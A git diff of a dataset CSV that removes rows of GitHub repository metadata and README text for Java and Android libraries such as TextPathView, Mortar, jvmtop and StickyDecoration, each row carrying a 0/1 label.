diff --git "a/train.csv" "b/train.csv" --- "a/train.csv" +++ "b/train.csv" @@ -1,151023 +1,3 @@ -full_name,description,created_at,last_commit,readme,label -totond/TextPathView,A View with text path animation!,2018-01-10T10:36:47Z,,"# TextPathView - -![](https://img.shields.io/badge/JCenter-0.2.1-brightgreen.svg) - -
- - -
- - > [Go to the English README](https://github.com/totond/TextPathView/blob/master/README-en.md) - - -## 介绍 -  TextPathView是一个把文字转化为路径动画然后展现出来的自定义控件。效果如上图。 - - > 这里有[原理解析!](https://juejin.im/post/5a9677b16fb9a063375765ad) - -### v0.2.+重要更新 - - - 现在不但可以控制文字路径结束位置end,还可以控制开始位置start,如上图二 - - 可以通过PathCalculator的子类来控制实现一些字路径变化,如下面的MidCalculator、AroundCalculator、BlinkCalculator - - 可以通知直接设置FillColor属性来控制结束时是否填充颜色 - - ![TextPathView v0.2.+](https://raw.githubusercontent.com/totond/MyTUKU/master/textpathnew1.png) - -## 使用 -  主要的使用流程就是输入文字,然后设置一些动画的属性,还有画笔特效,最后启动就行了。想要自己控制绘画的进度也可以,详情见下面。 - -### Gradle - -``` -compile 'com.yanzhikai:TextPathView:0.2.1' -``` - - > minSdkVersion 16 - - > 如果遇到播放完后消失的问题,请关闭硬件加速,可能是硬件加速对`drawPath()`方法不支持 - -### 使用方法 - -#### TextPathView -  TextPathView分为两种,一种是每个笔画按顺序刻画的SyncTextPathView,一种是每个笔画同时刻画的AsyncTextPathView,使用方法都是一样,在xml里面配置属性,然后直接在java里面调用startAnimation()方法就行了,具体的可以看例子和demo。下面是一个简单的例子: - -xml里面: - -``` - - - - -``` - -java里面使用: - -``` - atpv1 = findViewById(R.id.atpv_1); - stpv_2017 = findViewById(R.id.stpv_2017); - - //从无到显示 - atpv1.startAnimation(0,1); - //从显示到消失 - stpv_2017.startAnimation(1,0); -``` - -还可以通过控制进度,来控制TextPathView显示,这里用SeekBar: - -``` - sb_progress.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() { - @Override - public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) { - atpv1.drawPath(progress / 1000f); - stpv_2017.drawPath(progress / 1000f); - - } - } -``` - -#### PathView -  PathView是0.1.1版本之后新增的,拥有三个子类TextPathView、SyncPathView和AsyncPathView,前者上面有介绍是文字的路径,后面这两个就是图形的路径,必须要输入一个Path类,才能正常运行: - -``` -public class TestPath extends Path { - public TestPath(){ - init(); - } - - private void init() { - addCircle(350,300,150,Direction.CCW); - addCircle(350,300,100,Direction.CW); - addCircle(350,300,50,Direction.CCW); - moveTo(350,300); - lineTo(550,500); - } -} -``` - -``` - //必须先调用setPath设置路径 - aspv.setPath(new TestPath()); - aspv.startAnimation(0,1); -``` - -![](https://github.com/totond/MyTUKU/blob/master/textdemo2.gif?raw=true) -  (录屏可能有些问题,实际上是没有背景色的)上面就是SyncPathView和AsyncPathView效果,区别和文字路径是一样的。 - -### 属性 - -|**属性名称**|**意义**|**类型**|**默认值**| -|--|--|:--:|:--:| -|textSize | 文字的大小size | integer| 108 | -|text | 文字的具体内容 | String| Test| -|autoStart| 是否加载完后自动启动动画 | boolean| false| -|showInStart| 是否一开始就把文字全部显示 | boolean| false| -|textInCenter| 是否让文字内容处于控件中心 | boolean| false| -|duration | 动画的持续时间,单位ms | integer| 10000| -|showPainter | 在动画执行的时候是否执行画笔特效 | boolean| false| -|showPainterActually| 在所有时候是否展示画笔特效| boolean| false| -|~~textStrokeWidth~~ strokeWidth | 路径刻画的线条粗细 | dimension| 5px| -|~~textStrokeColor~~ pathStrokeColor| 路径刻画的线条颜色 | color| Color.black| -|paintStrokeWidth | 画笔特效刻画的线条粗细 | dimension| 3px| -|paintStrokeColor | 画笔特效刻画的线条颜色 | color| Color.black| -|repeat| 是否重复播放动画,重复类型| enum | NONE| -|fillColor| 文字动画结束时是否填充颜色 | boolean | false | - -|**repeat属性值**|**意义**| -|--|--| -|NONE|不重复播放| -|RESTART|动画从头重复播放| -|REVERSE|动画从尾重复播放| - - - > PS:showPainterActually属性,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false。因此最好用于使用非自带动画的时候。 - -### 方法 - -#### 画笔特效 - -``` - //设置画笔特效 - public void setPainter(SyncPathPainter painter); - //设置画笔特效 - public void setPainter(SyncPathPainter painter); -``` -  因为绘画的原理不一样,画笔特效也分两种: - -``` - public interface SyncPathPainter extends PathPainter { - //开始动画的时候执行 - void onStartAnimation(); - - /** - * 绘画画笔特效时候执行 - * @param x 当前绘画点x坐标 - * @param y 当前绘画点y坐标 - * @param paintPath 画笔Path对象,在这里画出想要的画笔特效 - */ - @Override - void onDrawPaintPath(float x, float y, Path paintPath); - } - - public interface AsyncPathPainter extends PathPainter { - /** - * 绘画画笔特效时候执行 - * @param x 当前绘画点x坐标 - * @param y 当前绘画点y坐标 - * @param paintPath 画笔Path对象,在这里画出想要的画笔特效 - */ - @Override - void onDrawPaintPath(float x, float y, Path paintPath); - } -``` -  看名字就知道是对应哪一个了,想要自定义画笔特效的话就可以实现上面之中的一个或者两个接口来自己画啦。 -  另外,还有里面已经自带了3种画笔特效,可供参考和使用(关于这些画笔特效的实现,可以参考[原理解析](http://blog.csdn.net/totond/article/details/79375200)): - -``` - -//箭头画笔特效,根据传入的当前点与上一个点之间的速度方向,来调整箭头方向 -public class ArrowPainter implements SyncPathPainter { - -//一支笔的画笔特效,就是在绘画点旁边画多一支笔 -public class PenPainter implements SyncPathPainter,AsyncPathPainter { - -//火花特效,根据箭头引申变化而来,根据当前点与上一个点算出的速度方向来控制火花的方向 -public class FireworksPainter implements SyncPathPainter { - -``` - -  由上面可见,因为烟花和箭头画笔特效都需要记录上一个点的位置,所以只适合按顺序绘画的SyncTextPathView,而PenPainter就适合两种TextPathView。仔细看它的代码的话,会发现画起来都是很简单的哦。 - -#### 自定义画笔特效 -  自定义画笔特效也是非常简单的,原理就是在当前绘画点上加上一个附加的Path,实现SyncPathPainter和AsyncPathPainter之中的一个或者两个接口,重写里面的`onDrawPaintPath(float x, float y, Path paintPath)`方法就行了,如下面这个: - -``` - atpv2.setPathPainter(new AsyncPathPainter() { - @Override - public void onDrawPaintPath(float x, float y, Path paintPath) { - paintPath.addCircle(x,y,6, Path.Direction.CCW); - } - }); -``` -![](https://github.com/totond/MyTUKU/blob/master/textdemo3.gif?raw=true) - -#### 动画监听 - -``` - //设置自定义动画监听 - public void setAnimatorListener(PathAnimatorListener animatorListener); - -``` -  PathAnimatorListener是实现了AnimatorListener接口的类,继承它的时候注意不要删掉super父类方法,因为里面可能有一些操作。 - -#### 画笔获取 - -``` - //获取绘画文字的画笔 - public Paint getDrawPaint() { - return mDrawPaint; - } - - //获取绘画画笔特效的画笔 - public Paint getPaint() { - return mPaint; - } -``` - -#### 控制绘画 - -``` - /** - * 绘画文字路径的方法 - * - * @param start 路径开始点百分比 - * @param end 路径结束点百分比 - */ - public abstract void drawPath(float start, float end); - - /** - * 开始绘制路径动画 - * @param start 路径比例,范围0-1 - * @param end 路径比例,范围0-1 - */ - public void startAnimation(float start, float end); - - /** - * 绘画路径的方法 - * @param progress 绘画进度,0-1 - */ - public void drawPath(float progress); - - /** - * Stop animation - */ - public void stopAnimation(); - - /** - * Pause animation - */ - @RequiresApi(api = Build.VERSION_CODES.KITKAT) - public void pauseAnimation(); - - /** - * Resume animation - */ - @RequiresApi(api = Build.VERSION_CODES.KITKAT) - public void resumeAnimation(); -``` - -#### 填充颜色 - -``` - //直接显示填充好颜色了的全部文字 - public void showFillColorText(); - - //设置动画播放完后是否填充颜色 - public void setFillColor(boolean fillColor) -``` -  由于正在绘画的时候文字路径不是封闭的,填充颜色会变得很混乱,所以这里给出`showFillColorText()`来设置直接显示填充好颜色了的全部文字,一般可以在动画结束后文字完全显示后过渡填充 - -![](https://github.com/totond/MyTUKU/blob/master/textdemo4.gif?raw=true) - - - - - -#### 取值计算器 - -​ 0.2.+版本开始,加入了取值计算器PathCalculator,可以通过`setCalculator(PathCalculator calculator)`方法设置。PathCalculator可以控制路径的起点start和终点end属性在不同progress对应的取值。TextPathView自带一些PathCalculator子类: - -- **MidCalculator** - - start和end从0.5开始往两边扩展: - -![MidCalculator](https://github.com/totond/MyTUKU/blob/master/text4.gif?raw=true) - -- **AroundCalculator** - - start会跟着end增长,end增长到0.75后start会反向增长 - -![AroundCalculator](https://github.com/totond/MyTUKU/blob/master/text5.gif?raw=true) - -- **BlinkCalculator** - - start一直为0,end自然增长,但是每增加几次会有一次end=1,造成闪烁 - -![BlinkCalculator](https://github.com/totond/MyTUKU/blob/master/text2.gif?raw=true) - -- **自定义PathCalculator:**用户可以通过继承抽象类PathCalculator,通过里面的`setStart(float start)`和`setEnd(float end)`,具体可以参考上面几个自带的PathCalculator实现代码。 - -#### 其他 - -``` - //设置文字内容 - public void setText(String text); - - //设置路径,必须先设置好路径在startAnimation(),不然会报错! - public void setPath(Path path) ; - - //设置字体样式 - public void setTypeface(Typeface typeface); - - //清除画面 - public void clear(); - - //设置动画时能否显示画笔效果 - public void setShowPainter(boolean showPainter); - - //设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false - public void setCanShowPainter(boolean canShowPainter); - - //设置动画持续时间 - public void setDuration(int duration); - - //设置重复方式 - public void setRepeatStyle(int repeatStyle); - - //设置Path开始结束取值的计算器 - public void setCalculator(PathCalculator calculator) - -``` - -## 更新 - - - 2018/03/08 **version 0.0.5**: - - 增加了`showFillColorText()`方法来设置直接显示填充好颜色了的全部文字。 - - 把PathAnimatorListener从TextPathView的内部类里面解放出来,之前使用太麻烦了。 - - 增加`showPainterActually`属性,设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动将它设置为false。因此它用处就是在不使用自带Animator的时候显示画笔特效。 - - - 2018/03/08 **version 0.0.6**: - - 增加了`stop(), pause(), resume()`方法来控制动画。之前是觉得让使用者自己用Animator实现就好了,现在一位外国友人[toanvc](https://github.com/toanvc)提交的PR封装好了,我稍作修改,不过后两者使用时API要大于等于19。 - - 增加了`repeat`属性,让动画支持重复播放,也是[toanvc](https://github.com/toanvc)同学的PR。 - - - 2018/03/18 **version 0.1.0**: - - 重构代码,加入路径动画SyncPathView和AsyncPathView,把总父类抽象为PathView - - 增加`setDuration()`、`setRepeatStyle()` - - 修改一系列名字如下: - -|Old Name|New Name| -|---|---| -|TextPathPainter|PathPainter| -|SyncTextPainter|SyncPathPainter| -|AsyncTextPainter|AsyncPathPainter| -|TextAnimatorListener|PathAnimatorListener| - - - 2018/03/21 **version 0.1.2**: - - 修复高度warp_content时候内容有可能显示不全 - - 原来PathMeasure获取文字Path时候,最后会有大概一个像素的缺失,现在只能在onDraw判断progress是否为1来显示完全路径(但是这样可能会导致硬件加速上显示不出来,需要手动关闭这个View的硬件加速) - - 增加字体设置 - - 支持自动换行 - -![](https://github.com/totond/MyTUKU/blob/master/textdemo5.gif?raw=true) - - - 2018/09/09 **version 0.1.3**: - - 默认关闭此控件的硬件加速 - - 加入内存泄漏控制 - - 准备后续优化 -- 2019/04/04 **version 0.2.1**: - - 现在不但可以控制文字路径结束位置end,还可以控制开始位置start - - 可以通过PathCalculator的子类来控制实现一些字路径变化,如上面的MidCalculator、AroundCalculator、BlinkCalculator - - 可以通知直接设置FillColor属性来控制结束时是否填充颜色 - - 硬件加速问题解决,默认打开 - - 去除无用log和报错 - - -#### 后续将会往下面的方向努力: - - - 更多的特效,更多的动画,如果有什么想法和建议的欢迎issue提出来一起探讨,还可以提交PR出一份力。 - - 更好的性能,目前单个TextPathView在模拟器上运行动画时是不卡的,多个就有一点点卡顿了,在性能较好的真机多个也是没问题的,这个性能方面目前还没头绪。 - - 文字换行符支持。 - - Path的宽高测量(包含空白,从坐标(0,0)开始) - - -## 贡献代码 -  如果想为TextPathView的完善出一份力的同学,欢迎提交PR: - - 首先请创建一个分支branch。 - - 如果加入新的功能或者效果,请不要覆盖demo里面原来用于演示Activity代码,如FristActivity里面的实例,可以选择新增一个Activity做演示测试,或者不添加演示代码。 - - 如果修改某些功能或者代码,请附上合理的依据和想法。 - - 翻译成English版README(暂时没空更新英文版) - -## 开源协议 -  TextPathView遵循MIT协议。 - -## 关于作者 - > id:炎之铠 - - > 炎之铠的邮箱:yanzhikai_yjk@qq.com - - > CSDN:http://blog.csdn.net/totond - - - - - - -",0 -unofficial-openjdk/openjdk,Do not send pull requests! Automated Git clone of various OpenJDK branches,2012-08-09T20:39:52Z,,"This repository is no longer actively updated. Please see https://github.com/openjdk for a much better mirror of OpenJDK! -",0 -square/mortar,"A simple library that makes it easy to pair thin views with dedicated controllers, isolated from most of the vagaries of the Activity life cycle.",2013-11-09T00:01:50Z,,"# Mortar - -## Deprecated - -Mortar had a good run and served us well, but new use is strongly discouraged. The app suite at Square that drove its creation is in the process of replacing Mortar with [Square Workflow](https://square.github.io/workflow/). - -## What's a Mortar? - -Mortar provides a simplified, composable overlay for the Android lifecycle, -to aid in the use of [Views as the modular unit of Android applications][rant]. -It leverages [Context#getSystemService][services] to act as an a la carte supplier -of services like dependency injection, bundle persistence, and whatever else -your app needs to provide itself. - -One of the most useful services Mortar can provide is its [BundleService][bundle-service], -which gives any View (or any object with access to the Activity context) safe access to -the Activity lifecycle's persistence bundle. For fans of the [Model View Presenter][mvp] -pattern, we provide a persisted [Presenter][presenter] class that builds on BundleService. -Presenters are completely isolated from View concerns. They're particularly good at -surviving configuration changes, weathering the storm as Android destroys your portrait -Activity and Views and replaces them with landscape doppelgangers. - -Mortar can similarly make [Dagger][dagger] ObjectGraphs (or [Dagger2][dagger2] -Components) visible as system services. Or not — these services are -completely decoupled. - -Everything is managed by [MortarScope][scope] singletons, typically -backing the top level Application and Activity contexts. You can also spawn -your own shorter lived scopes to manage transient sessions, like the state of -an object being built by a set of wizard screens. - - - -These nested scopes can shadow the services provided by higher level scopes. -For example, a [Dagger extension graph][ogplus] specific to your wizard session -can cover the one normally available, transparently to the wizard Views. -Calls like `ObjectGraphService.inject(getContext(), this)` are now possible -without considering which graph will do the injection. - -## The Big Picture - -An application will typically have a singleton MortarScope instance. -Its job is to serve as a delegate to the app's `getSystemService` method, something like: - -```java -public class MyApplication extends Application { - private MortarScope rootScope; - - @Override public Object getSystemService(String name) { - if (rootScope == null) rootScope = MortarScope.buildRootScope().build(getScopeName()); - - return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); - } -} -``` - -This exposes a single, core service, the scope itself. From the scope you can -spawn child scopes, and you can register objects that implement the -[Scoped](https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Scoped.java#L18) -interface with it for setup and tear-down calls. - - * `Scoped#onEnterScope(MortarScope)` - * `Scoped#onExitScope(MortarScope)` - -To make a scope provide other services, like a [Dagger ObjectGraph][og], -you register them while building the scope. That would make our Application's -`getSystemService` method look like this: - -```java - @Override public Object getSystemService(String name) { - if (rootScope == null) { - rootScope = MortarScope.buildRootScope() - .with(ObjectGraphService.SERVICE_NAME, ObjectGraph.create(new RootModule())) - .build(getScopeName()); - } - - return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); - } -``` - -Now any part of our app that has access to a `Context` can inject itself: - -```java -public class MyView extends LinearLayout { - @Inject SomeService service; - - public MyView(Context context, AttributeSet attrs) { - super(context, attrs); - ObjectGraphService.inject(context, this); - } -} -``` - -To take advantage of the BundleService describe above, you'll put similar code -into your Activity. If it doesn't exist already, you'll -build a sub-scope to back the Activity's `getSystemService` method, and -while building it set up the `BundleServiceRunner`. You'll also notify -the BundleServiceRunner each time `onCreate` and `onSaveInstanceState` are -called, to make the persistence bundle available to the rest of the app. - -```java -public class MyActivity extends Activity { - private MortarScope activityScope; - - @Override public Object getSystemService(String name) { - MortarScope activityScope = MortarScope.findChild(getApplicationContext(), getScopeName()); - - if (activityScope == null) { - activityScope = MortarScope.buildChild(getApplicationContext()) // - .withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner()) - .withService(HelloPresenter.class.getName(), new HelloPresenter()) - .build(getScopeName()); - } - - return activityScope.hasService(name) ? activityScope.getService(name) - : super.getSystemService(name); - } - - @Override protected void onCreate(Bundle savedInstanceState) { - super.onCreate(savedInstanceState); - BundleServiceRunner.getBundleServiceRunner(this).onCreate(savedInstanceState); - setContentView(R.layout.main_view); - } - - @Override protected void onSaveInstanceState(Bundle outState) { - super.onSaveInstanceState(outState); - BundleServiceRunner.getBundleServiceRunner(this).onSaveInstanceState(outState); - } -} -``` - -With that in place, any object in your app can sign up with the `BundleService` -to save and restore its state. This is nice for views, since Bundles are less -of a hassle than the `Parcelable` objects required by `View#onSaveInstanceState`, -and a boon to any business objects in the rest of your app. - -Download --------- - -Download [the latest JAR][jar] or grab via Maven: - -```xml - - com.squareup.mortar - mortar - (insert latest version) - -``` - -Gradle: - -```groovy -compile 'com.squareup.mortar:mortar:(latest version)' -``` - -## Full Disclosure - -This stuff has been in ""rapid"" development over a pretty long gestation period, -but is finally stabilizing. We don't expect drastic changes before cutting a -1.0 release, but we still cannot promise a stable API from release to release. - -Mortar is a key component of multiple Square apps, including our flagship -[Square Register][register] app. - -License --------- - - Copyright 2013 Square, Inc. - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -[bundle-service]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/bundler/BundleService.java -[mvp]: http://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter -[dagger]: http://square.github.io/dagger/ -[dagger2]: http://google.github.io/dagger/ -[jar]: http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.squareup.mortar&a=mortar&v=LATEST -[og]: https://square.github.io/dagger/1.x/dagger/dagger/ObjectGraph.html -[ogplus]: https://github.com/square/dagger/blob/dagger-parent-1.1.0/core/src/main/java/dagger/ObjectGraph.java#L96 -[presenter]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Presenter.java -[rant]: http://corner.squareup.com/2014/10/advocating-against-android-fragments.html -[register]: https://play.google.com/store/apps/details?id=com.squareup -[scope]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/MortarScope.java -[services]: http://developer.android.com/reference/android/content/Context.html#getSystemService(java.lang.String) -",0 -joyoyao/superCleanMaster,[DEPRECATED] ,2015-02-12T03:37:41Z,,"# superCleanMaster -superCleanMaster is deprecated Thanks for all your support! - - -",0 -frogermcs/GithubClient,Example of Github API client implemented on top of Dagger 2 DI framework. ,2015-05-27T16:43:03Z,,"# GithubClient -Example of Github API client implemented on top of Dagger 2 DI framework. - -This code was created as an example for Dependency Injection with Dagger 2 series on my dev-blog: - -- [Introdution to Dependency Injection](http://frogermcs.github.io/dependency-injection-with-dagger-2-introdution-to-di/) -- [Dagger 2 API](http://frogermcs.github.io/dependency-injection-with-dagger-2-the-api/) -- [Dagger 2 - custom scopes](http://frogermcs.github.io/dependency-injection-with-dagger-2-custom-scopes/) -- [Dagger 2 - graph creation performance](http://frogermcs.github.io/dagger-graph-creation-performance/) -- [Dependency injection with Dagger 2 - Producers](http://frogermcs.github.io/dependency-injection-with-dagger-2-producers/) -- [Inject everything - ViewHolder and Dagger 2 (with Multibinding and AutoFactory example)](http://frogermcs.github.io/inject-everything-viewholder-and-dagger-2-example/) - -This code was originally prepared for my presentation at Google I/O Extended 2015 in Tech Space Cracow. http://www.meetup.com/GDG-Krakow/events/221822600/ -",1 -patric-r/jvmtop,"Java monitoring for the command-line, profiler included",2015-07-14T12:58:49Z,,"jvmtop is a lightweight console application to monitor all accessible, running jvms on a machine.
-In a top-like manner, it displays JVM internal metrics (e.g. memory information) of running java processes.
-
-Jvmtop does also include a CPU console profiler.
-
-It's tested with different releases of Oracle JDK, IBM JDK and OpenJDK on Linux, Solaris, FreeBSD and Windows hosts.
-Jvmtop requires a JDK - a JRE will not suffice.
-
-Please note that it's currently in an alpha state -
-if you experience an issue or need further help, please let us know.
-
-Jvmtop is open-source. Checkout the source code. Patches are very welcome!
-
-Also have a look at the documentation or at a captured live-example.
- -``` - JvmTop 0.8.0 alpha amd64 8 cpus, Linux 2.6.32-27, load avg 0.12 - https://github.com/patric-r/jvmtop - - PID MAIN-CLASS HPCUR HPMAX NHCUR NHMAX CPU GC VM USERNAME #T DL - 3370 rapperSimpleApp 165m 455m 109m 176m 0.12% 0.00% S6U37 web 21 -11272 ver.resin.Resin [ERROR: Could not attach to VM] -27338 WatchdogManager 11m 28m 23m 130m 0.00% 0.00% S6U37 web 31 -19187 m.jvmtop.JvmTop 20m 3544m 13m 130m 0.93% 0.47% S6U37 web 20 -16733 artup.Bootstrap 159m 455m 166m 304m 0.12% 0.00% S6U37 web 46 -``` - -
- -

Installation

-Click on the releases tab, download the -most recent tar.gz archive. Extract it, ensure that the `JAVA_HOME` environment variable points to a valid JDK and run `./jvmtop.sh`.

-Further information can be found in the [INSTALL file](https://github.com/patric-r/jvmtop/blob/master/INSTALL) - - - -

08/14/2013 jvmtop 0.8.0 released

-Changes: - - -Full changelog - -
- -In VM detail mode it shows you the top CPU-consuming threads, beside detailed metrics:
-
-
- -``` - JvmTop 0.8.0 alpha amd64, 4 cpus, Linux 2.6.18-34 - https://github.com/patric-r/jvmtop - - PID 3539: org.apache.catalina.startup.Bootstrap - ARGS: start - VMARGS: -Djava.util.logging.config.file=/home/webserver/apache-tomcat-5.5[...] - VM: Sun Microsystems Inc. Java HotSpot(TM) 64-Bit Server VM 1.6.0_25 - UP: 869:33m #THR: 106 #THRPEAK: 143 #THRCREATED: 128020 USER: webserver - CPU: 4.55% GC: 3.25% HEAP: 137m / 227m NONHEAP: 75m / 304m - TID NAME STATE CPU TOTALCPU BLOCKEDBY - 25 http-8080-Processor13 RUNNABLE 4.55% 1.60% - 128022 RMI TCP Connection(18)-10.101. RUNNABLE 1.82% 0.02% - 36578 http-8080-Processor164 RUNNABLE 0.91% 2.35% - 36453 http-8080-Processor94 RUNNABLE 0.91% 1.52% - 27 http-8080-Processor15 RUNNABLE 0.91% 1.81% - 14 http-8080-Processor2 RUNNABLE 0.91% 3.17% - 128026 JMX server connection timeout TIMED_WAITING 0.00% 0.00% -``` - -Pull requests / bug reports are always welcome.
-
-",0 -Gavin-ZYX/StickyDecoration,,2017-05-31T07:38:49Z,,"# StickyDecoration -利用`RecyclerView.ItemDecoration`实现顶部悬浮效果 - -![效果](http://upload-images.jianshu.io/upload_images/1638147-89986d7141741cdf.gif?imageMogr2/auto-orient/strip) - -## 支持 -- **LinearLayoutManager** -- **GridLayoutManager** -- **点击事件** -- **分割线** - -## 添加依赖 -项目要求: `minSdkVersion` >= 14. -在你的`build.gradle`中 : -```gradle -repositories { - maven { url 'https://jitpack.io' } -} -dependencies { - compile 'com.github.Gavin-ZYX:StickyDecoration:1.6.1' -} -``` - -**最新版本** -[![](https://jitpack.io/v/Gavin-ZYX/StickyDecoration.svg)](https://jitpack.io/#Gavin-ZYX/StickyDecoration) - -## 使用 - -#### 文字悬浮——StickyDecoration -> **注意** -使用recyclerView.addItemDecoration()之前,必须先调用recyclerView.setLayoutManager(); - -代码: -```java -GroupListener groupListener = new GroupListener() { - @Override - public String getGroupName(int position) { - //获取分组名 -        return mList.get(position).getProvince(); - } -}; -StickyDecoration decoration = StickyDecoration.Builder - .init(groupListener) - //重置span(使用GridLayoutManager时必须调用) - //.resetSpan(mRecyclerView, (GridLayoutManager) manager) - .build(); -... -mRecyclerView.setLayoutManager(manager); -//需要在setLayoutManager()之后调用addItemDecoration() -mRecyclerView.addItemDecoration(decoration); -``` -效果: - -![LinearLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-f3c2cbe712aa65fb.gif?imageMogr2/auto-orient/strip) - -![GridLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-e5e0374c896110d0.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) - - -**支持的方法:** - -| 方法 | 功能 | 默认 | -|-|-|-| -| setGroupBackground | 背景色 | #48BDFF | -| setGroupHeight | 高度 | 120px | -| setGroupTextColor | 字体颜色 | Color.WHITE | -| setGroupTextSize | 字体大小 | 50px | -| setDivideColor | 分割线颜色 | #CCCCCC | -| setDivideHeight | 分割线高宽度 | 0 | -| setTextSideMargin | 边距(靠左时为左边距 靠右时为右边距) | 10 | -| setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 | -| setSticky | 是否需要吸顶效果 | true | - -|方法|功能|描述| -|-|-|-| -| setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position | -| resetSpan | 重置 | 使用GridLayoutManager时必须调用 | - -### 自定义View悬浮——PowerfulStickyDecoration - -先创建布局`item_group` -```xml - - - - - - - -``` -创建`PowerfulStickyDecoration`,实现自定`View`悬浮 -```java -PowerGroupListener listener = new PowerGroupListener() { - @Override - public String getGroupName(int position) { - return mList.get(position).getProvince(); - } - - @Override - public View getGroupView(int position) { - //获取自定定义的组View - View view = getLayoutInflater().inflate(R.layout.item_group, null, false); - ((TextView) view.findViewById(R.id.tv)).setText(mList.get(position).getProvince()); - return view; - } -}; -PowerfulStickyDecoration decoration = PowerfulStickyDecoration.Builder - .init(listener) - //重置span(注意:使用GridLayoutManager时必须调用) - //.resetSpan(mRecyclerView, (GridLayoutManager) manager) - .build(); - - ... -mRecyclerView.addItemDecoration(decoration); -``` -效果: - -![效果](http://upload-images.jianshu.io/upload_images/1638147-3fed255296a6c3db.gif?imageMogr2/auto-orient/strip) - -**支持的方法:** - -| 方法 | 功能 | 默认 | -| -- | -- | -- | -| setGroupHeight | 高度 | 120px | -| setGroupBackground | 背景色 | #48BDFF | -| setDivideColor | 分割线颜色 | #CCCCCC | -| setDivideHeight | 分割线高宽度 | 0 | -| setCacheEnable | 是否使用缓存| 使用缓存 | -| setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 | -| setSticky | 是否需要吸顶效果 | true | - -|方法|功能|描述| -|-|-|-| -| setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position以及对应的viewId | -| resetSpan | 重置span |使用GridLayoutManager时必须调用 | -| notifyRedraw | 通知重新绘制 | 使用场景:网络图片加载后调用方法使用) | -| clearCache | 清空缓存 | 在使用缓存的情况下,数据改变时需要清理缓存 | - -**Tips** - -1、若使用网络图片时,在图片加载完成后需要调用 -```java -decoration.notifyRedraw(mRv, view, position); -``` - -2、使用缓存时,若数据源改变,需要调用clearCache清除数据 - -3、点击事件穿透问题,参考demo中MyRecyclerView。[issue47](https://github.com/Gavin-ZYX/StickyDecoration/issues/37) - -# 更新日志 - ------------------------------ 1.6.0 (2022-8-21)---------------------------- - -- fix:取消缓存无效问题 -- 迁移仓库 -- 迁移到Androidx - ------------------------------ 1.5.3 (2020-12-15)---------------------------- - -- 支持是否需要吸顶效果 - ------------------------------ 1.5.2 (2019-9-3)---------------------------- - -- fix:特殊情况下,吸顶效果不佳问题 - ------------------------------ 1.5.1 (2019-8-8)---------------------------- - -- fix:setHeaderCount导致显示错乱问题 - ------------------------------ 1.5.0 (2019-6-17)---------------------------- - -- fix:GridLayoutManager刷新后数据混乱问题 - ------------------------------ 1.4.12 (2019-5-8)---------------------------- - -- fix:setDivideColor不生效问题 - ------------------------------ 1.4.9 (2018-10-9)---------------------------- - -- fix:由于添加header导致的一些问题 - ------------------------------ 1.4.8 (2018-08-26)---------------------------- - -- 顶部悬浮栏点击事件穿透问题:提供处理方案 - ------------------------------ 1.4.7 (2018-08-16)---------------------------- - -- fix:数据变化后,布局未刷新问题 - ------------------------------ 1.4.6 (2018-07-29)---------------------------- - -- 修改缓存方式 -- 加入性能检测 - ------------------------------ 1.4.5 (2018-06-17)---------------------------- - -- 在GridLayoutManager中使用setHeaderCount方法导致布局错乱问题 - ------------------------------ 1.4.4 (2018-06-2)---------------------------- - -- 添加setHeaderCount方法 -- 修改README -- 修复bug - ------------------------------ 1.4.3 (2018-05-27)---------------------------- - -- 修复一些bug,更改命名 - ------------------------------ 1.4.2 (2018-04-2)---------------------------- - -- 增强点击事件,现在可以得到悬浮条内View点击事件(没有设置id时,返回View.NO_ID) - -- 修复加载更多返回null崩溃或出现多余的悬浮Item问题(把加载更多放在Item中的加载方式) - ------------------------------ 1.4.1 (2018-03-21)---------------------------- - -- 默认取消缓存,避免数据改变时显示出问题 - -- 添加clearCache方法用于清理缓存 - ------------------------------ 1.4.0 (2018-03-04)---------------------------- - -- 支持异步加载后的重新绘制(如网络图片加载) - -- 优化缓存 - -- 优化GridLayoutManager的分割线 - ------------------------------ 1.3.1 (2018-01-30)---------------------------- - -- 修改测量方式 - ------------------------------ 1.3.0 (2018-01-28)---------------------------- - -- 删除isAlignLeft()方法,需要靠右时,直接在布局中处理就可以了。 - -- 优化缓存机制。 -",0 -in28minutes/spring-master-class,"An updated introduction to the Spring Framework 5. Become an Expert understanding the core features of Spring In Depth. You would write Unit Tests, AOP, JDBC and JPA code during the course. Includes introductions to Spring Boot, JPA, Eclipse, Maven, JUnit and Mockito.",2017-08-07T06:56:45Z,,"# Spring Master Class - Journey from Beginner to Expert - -[![Image](https://www.springboottutorial.com/images/Course-Spring-Framework-Master-Class---Beginner-to-Expert.png ""Spring Master Class - Beginner to Expert"")](https://www.udemy.com/course/spring-tutorial-for-beginners/) - - -Learn the magic of Spring Framework. From IOC (Inversion of Control), DI (Dependency Injection), Application Context to the world of Spring Boot, AOP, JDBC and JPA. Get set for an incredible journey. - -### Introduction - -Spring Framework remains as popular today as it was when 